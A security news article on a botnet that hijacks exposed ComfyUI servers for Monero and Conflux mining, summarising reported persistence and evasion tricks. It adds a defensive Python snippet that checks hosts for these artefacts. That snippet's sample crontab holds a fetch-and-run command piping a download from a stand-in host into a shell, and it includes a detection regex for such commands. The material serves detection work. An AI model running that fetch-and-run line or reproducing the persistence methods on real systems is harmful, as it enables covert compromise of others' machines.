An aggressive campaign has been identified that targets internet-exposed servers running ComfyUI, a popular Stable Diffusion tool, and conscripts them into a cryptomining and proxy botnet. The activity is driven by a purpose-built Python scanner that sweeps major cloud IP ranges for susceptible targets. Once a target is found, malicious custom nodes are installed through ComfyUI-Manager if the instance does not already carry a vulnerable node, according to a report by Censys security researcher Mark Ellzey.
Mechanics of the Cryptomining Operation
The campaign systematically identifies and exploits misconfigured ComfyUI instances that permit remote code execution without authentication. Once compromised, the hosts join a cryptomining network that mines Monero with XMRig and Conflux with lolMiner, all administered centrally through a Flask-based command-and-control dashboard. Although only slightly more than 1,000 ComfyUI instances are publicly accessible, the attacker turns this relatively small pool into financial gain through opportunistic campaigns.
Tools and Exploitation Techniques
Censys uncovered the campaign after finding an open directory linked to the Aeza Group, known for bulletproof hosting services. This directory housed tools used for reconnaissance and exploitation, including scripts to locate and exploit ComfyUI instances. The scripts exploit ComfyUI’s custom nodes that execute raw Python code without authentication, allowing attackers to deliver malicious payloads efficiently.
Persistence and Competitive Targeting
To maintain persistence, the attackers install mechanisms that download a fresh shell script every six hours and re-run the exploit whenever ComfyUI starts. The script disables shell history, kills competing miners, and uses an LD_PRELOAD hook to conceal a watchdog process. The malware also protects its binaries with ‘chattr +i’ so they cannot be deleted or modified. Notably, the campaign targets a rival botnet, ‘Hisana’, redirecting its mining output to the attacker’s wallet and occupying its command port.
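As an added example (not code from the Censys report or from ComfyUI), the following Python functions check a Linux host for the persistence artefacts described above: a cron entry that fires every few hours and pipes a download into a shell, a library registered in /etc/ld.so.preload, binaries carrying the immutable flag in lsattr output, and a shell environment with history disabled. The sample inputs are constructed stand-ins; the hostname example.invalid, the library name and the file paths are assumptions, not indicators from the report.

```python
import re

# Constructed sample artefacts standing in for what a host triage would collect
# (crontab dump, /etc/ld.so.preload, lsattr output, shell environment). None of
# these paths, hostnames or flags come from the Censys report.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 */6 * * * curl -s http://example.invalid/x.sh | sh
15 3 * * 0 /usr/bin/logrotate /etc/logrotate.conf
"""
SAMPLE_LD_PRELOAD = "/usr/lib/libhooked.so\n"
SAMPLE_LSATTR = """\
----i---------e------- /usr/local/bin/xmrig
--------------e------- /usr/bin/python3
"""
SAMPLE_ENV = {"HISTFILE": "/dev/null", "HISTSIZE": "0"}
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def check_cron_beacons(crontab_text):
    """Cron lines that fire every N hours and pipe a download straight into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) == 6 and fields[1].startswith("*/") and FETCH_AND_RUN.search(fields[5]):
            hits.append(line)
    return hits

def check_ld_preload(preload_text):
    """/etc/ld.so.preload is normally empty; any library listed here is injected
    into every process, which is how a process-hiding hook is typically installed."""
    return [l.strip() for l in preload_text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]

def check_immutable(lsattr_text):
    """Paths whose lsattr flag field contains 'i', i.e. chattr +i was applied."""
    hits = []
    for line in lsattr_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            hits.append(parts[1])
    return hits

def check_history_disabled(env):
    """True when the shell has been told not to record command history."""
    return env.get("HISTFILE") in ("", "/dev/null") or env.get("HISTSIZE") == "0"
```

On a live host, feed these functions the output of `crontab -l`, the contents of /etc/ld.so.preload, `lsattr` over the directories you care about, and `os.environ`; any non-empty result is a lead to investigate, not proof of compromise on its own.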
Further analysis revealed an SSH attempt to another IP address associated with a worm campaign against vulnerable Redis servers, pointing to a broader attack strategy. Although the campaign at first appears unsophisticated, its tactics suggest a deliberate approach to exploiting exposed services for persistent, monetizable infections.
Broader Context of Botnet Campaigns
The discovery aligns with other botnet campaigns exploiting various vulnerabilities across platforms like n8n, Tenda routers, and Apache ActiveMQ to install malware for cryptomining and DDoS attacks. Researchers have observed a significant increase in botnet activity, partly due to the availability of source code for botnets like Mirai, facilitating widespread attacks.
As botnet campaigns continue to proliferate, the cybersecurity landscape faces ongoing challenges in protecting exposed services from exploitation. Continuous monitoring and updating of security protocols remain essential in mitigating such threats.
